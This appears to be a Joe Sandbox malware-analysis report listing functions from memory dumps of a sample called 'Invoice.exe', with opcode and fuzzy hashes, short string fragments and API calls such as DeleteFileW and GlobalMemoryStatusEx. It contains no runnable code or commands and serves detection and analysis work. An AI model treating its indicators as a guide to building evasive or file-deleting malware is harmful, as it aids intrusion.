Source File: 00000000.00000002.1726153462.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e356e23db96a1eaae46b4b5c0445e38ce77a94ffb8c9140ae060b2b8e1530cb8
Instruction ID: 27f7870f7be2b1e5d1e115a8eb4362acddcd0f1156f1f0c5a2461214032d0086
Opcode Fuzzy Hash: e356e23db96a1eaae46b4b5c0445e38ce77a94ffb8c9140ae060b2b8e1530cb8
Instruction Fuzzy Hash: 4541F1B0E1120AEFDB08CFAAC4855AEFBF2BF89310F24D46AD415E7210E7349A418F54

Uniqueness

Uniqueness Score: -1.00%

Function 078A1450 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1726153462.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04febe879c510195acd7356adb9638507d684e05362c1277cb13cb47e349fce2
Instruction ID: c03d8fa2da7aa6ef41a0cd8b125902f7809f07428e072d5a49a4c6de27d4bf69
Opcode Fuzzy Hash: 04febe879c510195acd7356adb9638507d684e05362c1277cb13cb47e349fce2
Instruction Fuzzy Hash: 8B41E3B0E1121EEBDB48CFAAD4855AEFBF6BF89310F14D12AD415E7200E7349A418F54

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Invoice.exePID: 7396, Parent PID: 6428COMMON

Execution Graph

Execution Coverage:	12.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	25
Total number of Limit Nodes:	5

Executed Functions

Function 066934A0 Relevance: 8.0, Strings: 6, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$fq, xrefs: 06693BC8
$fq, xrefs: 06693BD4
$fq, xrefs: 06693B9F
$fq, xrefs: 06693BF8
$fq, xrefs: 06693BAB
$fq, xrefs: 06693BEC

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID: $fq$$fq$$fq$$fq$$fq$$fq
API String ID: 0-1582559945
Opcode ID: 8c2e5578c4b3be1bdba14f843a897984eec2dd6f31381bccc198831586679a2f
Instruction ID: 32cd578edc723d62507c2d3fc1cbaf6925f0daa9c69523ccbb3b7fe088818ee7
Opcode Fuzzy Hash: 8c2e5578c4b3be1bdba14f843a897984eec2dd6f31381bccc198831586679a2f
Instruction Fuzzy Hash: 6B321E31E1065ACFCB15EF75C89499DB7B6FFC9300F20869AD409A7364EB30A985CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06697DA0 Relevance: 3.0, Strings: 2, Instructions: 474
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$fq, xrefs: 0669830C
$fq, xrefs: 06698318

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID: $fq$$fq
API String ID: 0-2537786760
Opcode ID: 35ac16e39f55e8c137711b7d626506b321cf9646b1d8c66e115ec77df66a43a8
Instruction ID: 673d2ca7a2b1394381cefd8173a0bd48e077055beb01a0ed636a68f3ed777321
Opcode Fuzzy Hash: 35ac16e39f55e8c137711b7d626506b321cf9646b1d8c66e115ec77df66a43a8
Instruction Fuzzy Hash: 1C029F30B002158FDF55DBA8D590A6EB7F6FF85310F148969D806AB399DB35EC42CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 066955E0 Relevance: 1.8, Strings: 1, Instructions: 598
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$, xrefs: 06695913

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: 44750c63d50de7585cb2dac9ca7e567cc4d4e5c49770e40abe63c7a82104c538
Instruction ID: fc6b1a244c35cd1f6997a804eeea4da31fc056739f6c33df64cda48f9f1467e0
Opcode Fuzzy Hash: 44750c63d50de7585cb2dac9ca7e567cc4d4e5c49770e40abe63c7a82104c538
Instruction Fuzzy Hash: 2E22E471E002159FDF65DFA4C5806AEBBBAEF85320F208469D846EB354DB31ED45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 06696618 Relevance: .8, Instructions: 824COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 222035c8c60bab4715ea66d33882bed61ed479b3674cf4788ffafb6525a05f39
Instruction ID: e5d09da7a784de047d5f53d29f9f66e92d72b941beef4703c248847fa4620016
Opcode Fuzzy Hash: 222035c8c60bab4715ea66d33882bed61ed479b3674cf4788ffafb6525a05f39
Instruction Fuzzy Hash: AC62B034B002058FEF54DB68D594AADBBF6EF84314F248469E806EB355DB35ED42CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0669ACF0 Relevance: 12.9, Strings: 10, Instructions: 391
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$fq, xrefs: 0669AE70
$fq, xrefs: 0669AE93
$fq, xrefs: 0669AE9F
$fq, xrefs: 0669AE1D
$fq, xrefs: 0669AE11
dM, xrefs: 0669B08F
dM, xrefs: 0669B170
$fq, xrefs: 0669AE64
$fq, xrefs: 0669AEBC
$fq, xrefs: 0669AEC8

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID: dM$dM$$fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq
API String ID: 0-413946179
Opcode ID: 8dfd9b0eb4959a405ae03de24ec4c65c50f2e296a5fbb2e98eddb0c80c1b15b4
Instruction ID: 103d09c09e8a4fbe6315a616f4614d5ff501a189adbc9067b81adac0b03a6563
Opcode Fuzzy Hash: 8dfd9b0eb4959a405ae03de24ec4c65c50f2e296a5fbb2e98eddb0c80c1b15b4
Instruction Fuzzy Hash: 65E15230E102098FDF55DFA9E5806AEB7F6EF85300F249529D805AB355DF34D846CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06699170 Relevance: 5.2, Strings: 4, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$fq, xrefs: 066991B7
$fq, xrefs: 066991FE
$fq, xrefs: 066991C3
$fq, xrefs: 066991F2

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID: $fq$$fq$$fq$$fq
API String ID: 0-2113499236
Opcode ID: 3e9ebe7adafb7cf101fd4e04df7624ed924722135c8f15c954d80de9752c380e
Instruction ID: f7f2aa346cea82faf0826ac8fa6ebe32fd76fcb035cca68011aba1dd6242dbb5
Opcode Fuzzy Hash: 3e9ebe7adafb7cf101fd4e04df7624ed924722135c8f15c954d80de9752c380e
Instruction Fuzzy Hash: DE914F30F1061A8FDF55DB64D990BAE77B6FF85300F1489A9D809EB398EE309D418B91

Uniqueness

Uniqueness Score: -1.00%

Function 0669CF70 Relevance: 4.6, Strings: 3, Instructions: 805
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$fq, xrefs: 0669D37B
$fq, xrefs: 0669D36F
$fq, xrefs: 0669D367

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID: $fq$$fq$$fq
API String ID: 0-837900676
Opcode ID: 0a12a73776f2965a29a5568b901dc4dcebecbd5afe82266040f7956fea39b760
Instruction ID: ab22bb1ec084ff31b1f72f25ec76b5ddfd72add17d75a5391638f279fa5fd44a
Opcode Fuzzy Hash: 0a12a73776f2965a29a5568b901dc4dcebecbd5afe82266040f7956fea39b760
Instruction Fuzzy Hash: A0627F30A006068FCB55EF68E590A5EB7F6FF84300F249A69D405AF359DB35ED86CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06694BA0 Relevance: 3.9, Strings: 3, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fkq, xrefs: 06694BCB
\Okq, xrefs: 06694D7B
XPkq, xrefs: 06694CF1

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID: fkq$XPkq$\Okq
API String ID: 0-673657909
Opcode ID: 053248973b700b34509d178975418001e679388f2dce8758a68ce54e6cfed9b5
Instruction ID: 2001dff72af210396a97cc7e0cfda75ce4b077e653470c6c9d1167c1f7052316
Opcode Fuzzy Hash: 053248973b700b34509d178975418001e679388f2dce8758a68ce54e6cfed9b5
Instruction Fuzzy Hash: 77616131F002199FEF549FA5D854BAEBBF6EF88300F20852AE506AB395DE754C458B50

Uniqueness

Uniqueness Score: -1.00%

Function 06699161 Relevance: 2.7, Strings: 2, Instructions: 162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$fq, xrefs: 066991B7
$fq, xrefs: 066991F2

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID: $fq$$fq
API String ID: 0-2537786760
Opcode ID: 0584533ea607adf2dfab099118bab7ef078e2f51571c3543ca5898384387fe69
Instruction ID: b1a81275108da18a080fefe1882d6b561147cb13189551ce7674665f493e2246
Opcode Fuzzy Hash: 0584533ea607adf2dfab099118bab7ef078e2f51571c3543ca5898384387fe69
Instruction Fuzzy Hash: F4515230B005069FDF55DB78D990BAE77F6FB85350F148969D805EB39CEA309D018BA0

Uniqueness

Uniqueness Score: -1.00%

Function 06694B90 Relevance: 2.6, Strings: 2, Instructions: 144
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fkq, xrefs: 06694BCB
XPkq, xrefs: 06694CF1

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID: fkq$XPkq
API String ID: 0-3439102645
Opcode ID: 0ace3657ccd4c11027b832d0e815a9ff73bd989f0612715a243ef3763688d133
Instruction ID: 3771346365ced701613ea132b05c93f3affb7b8d397ff7452f7f892fe1db0136
Opcode Fuzzy Hash: 0ace3657ccd4c11027b832d0e815a9ff73bd989f0612715a243ef3763688d133
Instruction Fuzzy Hash: B1516175F002199FEB549FA5C454BAEBBF7EF88300F208529E506AB395DE748C058B90

Uniqueness

Uniqueness Score: -1.00%

Function 00ED8169 Relevance: 1.6, APIs: 1, Instructions: 61
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(00000000), ref: 00ED81E0

Memory Dump Source

Source File: 0000000A.00000002.4152872484.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ed0000_Invoice.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 35d85b1e233e5be1d2463c610474ba2fbeb8450da3117ec02a3f228e8ac6aee8
Instruction ID: 4dcba8576dbf61ca240e8bdfa7606c5cafbe1431c01edef96035d145fc4af58c
Opcode Fuzzy Hash: 35d85b1e233e5be1d2463c610474ba2fbeb8450da3117ec02a3f228e8ac6aee8
Instruction Fuzzy Hash: 732138B1C0065A9FCB14CF9AC9457AEFBB4FB48310F14852AD818B7340D774A906CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00ED8170 Relevance: 1.6, APIs: 1, Instructions: 56
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(00000000), ref: 00ED81E0

Memory Dump Source

Source File: 0000000A.00000002.4152872484.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ed0000_Invoice.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 55773215bcc62ebe3c27112dc65dbbd4d367cf4985fa4706c13dee1d95720c00
Instruction ID: befba9b509e5c93ab90f79a0062ac8fe0fe3cf0dd4686186f97195610098b15c
Opcode Fuzzy Hash: 55773215bcc62ebe3c27112dc65dbbd4d367cf4985fa4706c13dee1d95720c00
Instruction Fuzzy Hash: 621122B2C0065A9BCB14CF9AC945B9EFBB4FB48320F14852AD818B7340D778A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00EDF0EC Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNELBASE ref: 00EDF157

Memory Dump Source

Source File: 0000000A.00000002.4152872484.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ed0000_Invoice.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 81d0c2da78bbaab682c76211ec3ccb4b2266a17c8ad04d1ac9af00b9db1ee55d
Instruction ID: d37212ff6bb1f3b021b951197d3ad425a1fb93044ea6b5d6d1dc26b4fe26d8ce
Opcode Fuzzy Hash: 81d0c2da78bbaab682c76211ec3ccb4b2266a17c8ad04d1ac9af00b9db1ee55d
Instruction Fuzzy Hash: 361100B1C0025A9FDB10CF9AC444BDEFBF4AB48324F24856AD418B7341D378A941CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EDF0F0 Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNELBASE ref: 00EDF157

Memory Dump Source

Source File: 0000000A.00000002.4152872484.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ed0000_Invoice.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 766d539ec51f2be9cbb4c0a6985a2f562fdc2caed06b7ddc9efdc728353dd3b4
Instruction ID: 0442fee8a3422a71022dcfcb05f968cd509b4ac920ea1a1c362d3af7c491322d
Opcode Fuzzy Hash: 766d539ec51f2be9cbb4c0a6985a2f562fdc2caed06b7ddc9efdc728353dd3b4
Instruction Fuzzy Hash: B11100B1C0025A9BCB10CF9AC445B9EFBF4AB48324F14816AD818B7341D378A940CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00E10981 Relevance: 1.4, Strings: 1, Instructions: 189COMMON

Download Yara Rule

Strings

(jq, xrefs: 00E10B27

Memory Dump Source

Source File: 0000000A.00000002.4151423115.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e10000_Invoice.jbxd

Similarity

API ID:
String ID: (jq
API String ID: 0-3225323518
Opcode ID: a80bc812ba56fc6d6593305300becf9bd748c1eb527cde112402e3f5b25cd484
Instruction ID: 8f0c4482275e03a504a764058763f524e7a4ac34a4f940638034b81547924832
Opcode Fuzzy Hash: a80bc812ba56fc6d6593305300becf9bd748c1eb527cde112402e3f5b25cd484
Instruction Fuzzy Hash: AB51E635A043498FCB09DBB8C8A56EE7BF2EF85310F145499D401FB292DA749D82CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0669DAE5 Relevance: 1.4, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

PHfq, xrefs: 0669DC41

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID: PHfq
API String ID: 0-2154135885
Opcode ID: 0b1bf884276a965af3756f25052289637c53a0dde66d4629c051e1533fe69d4b
Instruction ID: 9e53d03d4e54fa321acaea22a6d8e4b626a1a4cccb3673164fb466a63ba24383
Opcode Fuzzy Hash: 0b1bf884276a965af3756f25052289637c53a0dde66d4629c051e1533fe69d4b
Instruction Fuzzy Hash: 6E416E70E0060A9FDF65DF65D89079EBBBABF85300F244929E805E7384DB749846CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 066921D0 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

PHfq, xrefs: 0669230B

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID: PHfq
API String ID: 0-2154135885
Opcode ID: 02c5a1bb6a60128c1354a112d195609cc20447be3fd6cad5bf9a6e9c8365b2cd
Instruction ID: b036bfaa2fa24b253d66eb127cd5e8052e4841feb603403abffb54f89075aa78
Opcode Fuzzy Hash: 02c5a1bb6a60128c1354a112d195609cc20447be3fd6cad5bf9a6e9c8365b2cd
Instruction Fuzzy Hash: 9331E630B202059FCF499B74D56466F77AAAF89310F104868D806EB395DF35DD42C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 066982E7 Relevance: 1.3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

Strings

$fq, xrefs: 0669830C

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID: $fq
API String ID: 0-12477121
Opcode ID: a4effd945bb8355e70a4312467d6fc597cec752d4302d85ff59e9d2068b63ccf
Instruction ID: 0d7081a277d16996eb87b0fe8050939d0eefffe38cdf6aeb842e8af4ced27aca
Opcode Fuzzy Hash: a4effd945bb8355e70a4312467d6fc597cec752d4302d85ff59e9d2068b63ccf
Instruction Fuzzy Hash: 4DF05E31E00108DFDF648EE5EA406ADB7B8EB42260F58486ACC0493254D3359D53C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 06694A89 Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

\Okq, xrefs: 06694A95

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID: \Okq
API String ID: 0-2052216381
Opcode ID: 4194718f9069f62fb78271541308f9858647d01f9569e784fb1bcf40bfc72a7d
Instruction ID: 7f085f5a9e16a61cb4874bb1059745f92b28f9aa8bd5aea49f278778487ec409
Opcode Fuzzy Hash: 4194718f9069f62fb78271541308f9858647d01f9569e784fb1bcf40bfc72a7d
Instruction Fuzzy Hash: 31F0DA30A10129DFDF14DF94E859BAEBBB6FF84705F20452AE402A7294CBB45C06CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0669C1A8 Relevance: .6, Instructions: 644COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cff6d34780d1791e1c44a98cc35816520c5ebaffbb2e2c867dce60cd93e1d58
Instruction ID: cf79c221b21be938a7f015e7335c547ced66be231fd52887cb3fc924743785c4
Opcode Fuzzy Hash: 2cff6d34780d1791e1c44a98cc35816520c5ebaffbb2e2c867dce60cd93e1d58
Instruction Fuzzy Hash: 3A329030B002058FDF55DB68D990BAEB7B6FB89310F148569E805EB355DB35EC42CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0669B42C Relevance: .6, Instructions: 561COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 448c590bea28e0a5ce6058dc601b4eecd871ac69e2cc108f27754bd9efba1b5b
Instruction ID: 0388fe8444c0312864ecb51ddcb4c9423055317ae9afd0af2393024d6848feab
Opcode Fuzzy Hash: 448c590bea28e0a5ce6058dc601b4eecd871ac69e2cc108f27754bd9efba1b5b
Instruction Fuzzy Hash: 22126170E101098FDF64DBA8E5D07AFB7BAEB45310F248926E805EB395DA34DC81DB61

Uniqueness

Uniqueness Score: -1.00%

Function 06696218 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3daee85bc6eafb31f5b79d1e6098cf4094dad89f6eb3e0b2720ed36c1ed94660
Instruction ID: 77f07ea34338083ae078df83c42e25e676951d317e5d871954dd17d46924882b
Opcode Fuzzy Hash: 3daee85bc6eafb31f5b79d1e6098cf4094dad89f6eb3e0b2720ed36c1ed94660
Instruction Fuzzy Hash: 8C618072F006224BDF549B6DCC8066FAADAAFC4610B254439D80EDB364DEB6ED0287D1

Uniqueness

Uniqueness Score: -1.00%

Function 066942D8 Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f5ea5f30986a19f91a72ab9346858a94676afeb3a13556f5e2af9e7d85d950
Instruction ID: 47849eef14731e2ede63df7dd116b32fe35b99e5ead51861e822ca0ca95778f2
Opcode Fuzzy Hash: d8f5ea5f30986a19f91a72ab9346858a94676afeb3a13556f5e2af9e7d85d950
Instruction Fuzzy Hash: C8813C30B006098FDF54DFB9D55466EB7F6AF85310F248569D80AEB398EE30DC468B91

Uniqueness

Uniqueness Score: -1.00%

Function 066945F4 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b4e134917693be08d75a6098ef136ca9ce36311b85aa6a7cd7027d854780885
Instruction ID: b06a4baef9cebbf6c7354392bc804581bb56a2779a609850fe5437aaa92b48bc
Opcode Fuzzy Hash: 3b4e134917693be08d75a6098ef136ca9ce36311b85aa6a7cd7027d854780885
Instruction Fuzzy Hash: 22916070E002198BDF60CF68C880B9DB7B1FF85300F208595D549BB395DB70AA86CF90

Uniqueness

Uniqueness Score: -1.00%

Function 06694608 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12da16bebebdfc4d4654bfccc464b11009d2ef8f4ff33065ad34237468451f5b
Instruction ID: ac4cd63e48a738b95a29feba5e04689ce34f02067f1e35d3afccae2305852bb3
Opcode Fuzzy Hash: 12da16bebebdfc4d4654bfccc464b11009d2ef8f4ff33065ad34237468451f5b
Instruction Fuzzy Hash: 5B914074E106198BDF64DF68C880B9DB7B1FF89300F208599D549BB355DB70AA86CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0669EF38 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 293484918968102f9882a0b22dc41d9e253bfbdc9e3870992ee2bb15333bc7a1
Instruction ID: f8bfaa58702bd3ace769b0e24e735e66771a447b318070a3e82f0030b4045dac
Opcode Fuzzy Hash: 293484918968102f9882a0b22dc41d9e253bfbdc9e3870992ee2bb15333bc7a1
Instruction Fuzzy Hash: F9714E70A002099FDB54DFA8D990A9EBBFAFF84310F15842AE405EB355DB31EC46CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0669EF48 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1a1cacb018b40341c6616c858a97484f331367734ba037cf17ab9cb4416bec0
Instruction ID: 89e0987953f8f55df49e7fe618d3370388e7a6b2d6c0b08a99e3ba137b11cc74
Opcode Fuzzy Hash: a1a1cacb018b40341c6616c858a97484f331367734ba037cf17ab9cb4416bec0
Instruction Fuzzy Hash: AA713D70A002099FDB54DFA8D990A9EBBFAFF84304F15842AE405EB355DB31EC46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0669FCA8 Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1873d2dbe98e55d964dab6c9fe2cba50d1a1785aa1e095b437297c2296e79217
Instruction ID: e32ff6af0232b63ac5c5481d0661329a9a0233674b7d2ac05a4980ecd47d0779
Opcode Fuzzy Hash: 1873d2dbe98e55d964dab6c9fe2cba50d1a1785aa1e095b437297c2296e79217
Instruction Fuzzy Hash: CE51E131E00205DFDF54AFB8E4446AEBBBAEF85315F11887AE506E7351DB318849CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0669FA58 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82adf69abf6627981d00fb0d2891cfe37da93f5ca6df8e3be06c57d92992f9bf
Instruction ID: 3853f13874146f831679db484c467b48ce1377a48af3328fa90a357accaae8af
Opcode Fuzzy Hash: 82adf69abf6627981d00fb0d2891cfe37da93f5ca6df8e3be06c57d92992f9bf
Instruction Fuzzy Hash: FC51D770F202049BEF615BBCD89476F2A6FD789310F21452AEA4AC7395CE79CC4193B1

Uniqueness

Uniqueness Score: -1.00%

Function 0669FA68 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4195486027.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6690000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1a7a555ae9981d3ea0f15bc3539e6e19bdf7b630f3868f30f23418bc869dfd1
Instruction ID: 5b8c958dc5942497d2b752482e3d5bbc100965cbab5fc710de94541390ee5597
Opcode Fuzzy Hash: b1a7a555ae9981d3ea0f15bc3539e6e19bdf7b630f3868f30f23418bc869dfd1
Instruction Fuzzy Hash: 0351A370F202149BEF655BFCD89472F266FD789310F21452AEA4AC7399CE79CC8153A1

Uniqueness

